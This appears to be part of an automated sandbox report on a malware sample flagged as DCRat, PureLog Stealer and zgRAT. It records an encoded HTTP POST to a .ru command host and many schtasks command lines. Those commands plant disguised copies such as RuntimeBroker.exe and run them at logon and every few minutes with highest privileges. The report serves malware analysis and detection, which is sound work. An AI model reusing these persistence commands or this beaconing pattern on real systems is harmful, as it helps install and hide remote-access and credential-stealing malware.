                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          149192.168.2.450156104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:54.678699970 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:55.040359974 CET1056OUTData Raw: 55 54 5d 51 5f 5a 51 55 55 5a 54 59 51 53 55 52 58 5b 5c 5b 59 55 52 5c 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UT]Q_ZQUUZTYQSURX[\[YUR\][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ Y<!]#+&*($)9]3?!$'[->#+ R(<#^!'^)
                                                                                                                          Jan 1, 2025 04:23:55.144222975 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:55.318249941 CET810INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:55 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AVX8NZERH4kP4Ij1ZGtzKfLjDP80l%2Fly%2FSbfqxYg600BOflMNMApSzpeN8wsZ%2BvYlwQiL9oIVhRn5JXJ8dSQn5Q72nN2u5CSU%2BOjkU0oWRedln%2BAo7QBXTTYjUJcGMEBHgvYy0q%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf64b55af3c409-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3758&min_rtt=1473&rtt_var=5122&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=73912&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Statistics

                                                                                                                          CPU Usage

                                                                                                                          Click to jump to process

                                                                                                                          Memory Usage

                                                                                                                          Click to jump to process

                                                                                                                          High Level Behavior Distribution

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Behavior

                                                                                                                          Click to jump to process

                                                                                                                          System Behavior

                                                                                                                          General

                                                                                                                          Target ID:0
                                                                                                                          Start time:22:21:55
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Users\user\Desktop\U1jaLbTw1f.exe"
                                                                                                                          Imagebase:0xd80000
                                                                                                                          File size:1'914'880 bytes
                                                                                                                          MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1642273712.0000000000D82000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1687007054.000000001342A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:1
                                                                                                                          Start time:22:21:57
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:2
                                                                                                                          Start time:22:21:57
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:3
                                                                                                                          Start time:22:21:57
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:4
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe'" /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:5
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:6
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files\Internet Explorer\SIGNUP\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:7
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "mGDcgYSpPaqkzVyIrStmzarQirIsm" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe'" /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:8
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "mGDcgYSpPaqkzVyIrStmzarQirIs" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:9
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "mGDcgYSpPaqkzVyIrStmzarQirIsm" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:10
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\RuntimeBroker.exe'" /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:11
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Security\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:12
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:13
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "UserOOBEBrokerU" /sc MINUTE /mo 14 /tr "'C:\Windows\LiveKernelReports\UserOOBEBroker.exe'" /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:14
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "UserOOBEBroker" /sc ONLOGON /tr "'C:\Windows\LiveKernelReports\UserOOBEBroker.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:15
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe"
                                                                                                                          Imagebase:0x7c0000
                                                                                                                          File size:1'914'880 bytes
                                                                                                                          MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Avira
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 71%, ReversingLabs
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:16
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "UserOOBEBrokerU" /sc MINUTE /mo 5 /tr "'C:\Windows\LiveKernelReports\UserOOBEBroker.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:17
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "U1jaLbTw1fU" /sc MINUTE /mo 13 /tr "'C:\Users\user\Desktop\U1jaLbTw1f.exe'" /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:18
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe"
                                                                                                                          Imagebase:0x6c0000
                                                                                                                          File size:1'914'880 bytes
                                                                                                                          MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:19
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "U1jaLbTw1f" /sc ONLOGON /tr "'C:\Users\user\Desktop\U1jaLbTw1f.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:20
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Windows Security\RuntimeBroker.exe"
                                                                                                                          Imagebase:0x8f0000
                                                                                                                          File size:1'914'880 bytes
                                                                                                                          MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 71%, ReversingLabs
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:21
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks.exe /create /tn "U1jaLbTw1fU" /sc MINUTE /mo 5 /tr "'C:\Users\user\Desktop\U1jaLbTw1f.exe'" /rl HIGHEST /f
                                                                                                                          Imagebase:0x7ff76f990000
                                                                                                                          File size:235'008 bytes
                                                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:22
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Windows Security\RuntimeBroker.exe"
                                                                                                                          Imagebase:0x7b0000
                                                                                                                          File size:1'914'880 bytes
                                                                                                                          MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000016.00000002.4116310590.0000000002FB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000016.00000002.4116310590.000000000346C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000016.00000002.4116310590.0000000003610000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:23
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\LiveKernelReports\UserOOBEBroker.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\LiveKernelReports\UserOOBEBroker.exe
                                                                                                                          Imagebase:0x5c0000
                                                                                                                          File size:1'914'880 bytes
                                                                                                                          MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exe, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Avira
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 71%, ReversingLabs
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:24
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\WGIlBCoJLj.bat"
                                                                                                                          Imagebase:0x7ff6ab170000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:25
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:26
                                                                                                                          Start time:22:21:58
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\chcp.com
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:chcp 65001
                                                                                                                          Imagebase:0x7ff6db920000
                                                                                                                          File size:14'848 bytes
                                                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:27
                                                                                                                          Start time:22:21:59
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\System32\w32tm.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                          Imagebase:0x7ff649e80000
                                                                                                                          File size:108'032 bytes
                                                                                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:28
                                                                                                                          Start time:22:22:00
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          Imagebase:0x990000
                                                                                                                          File size:1'914'880 bytes
                                                                                                                          MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:29
                                                                                                                          Start time:22:22:01
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          Imagebase:0x6e0000
                                                                                                                          File size:1'914'880 bytes
                                                                                                                          MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:30
                                                                                                                          Start time:22:22:01
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\LiveKernelReports\UserOOBEBroker.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\LiveKernelReports\UserOOBEBroker.exe
                                                                                                                          Imagebase:0x730000
                                                                                                                          File size:1'914'880 bytes
                                                                                                                          MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:31
                                                                                                                          Start time:22:22:04
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files (x86)\jdownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exe"
                                                                                                                          Imagebase:0x2c0000
                                                                                                                          File size:1'914'880 bytes
                                                                                                                          MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:37
                                                                                                                          Start time:22:26:01
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Windows\LiveKernelReports\UserOOBEBroker.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\LiveKernelReports\UserOOBEBroker.exe
                                                                                                                          Imagebase:0xd60000
                                                                                                                          File size:1'914'880 bytes
                                                                                                                          MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:38
                                                                                                                          Start time:22:26:01
                                                                                                                          Start date:31/12/2024
                                                                                                                          Path:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          Wow64 process (32bit):
                                                                                                                          Commandline:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          Imagebase:
                                                                                                                          File size:1'914'880 bytes
                                                                                                                          MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                          Has elevated privileges:true
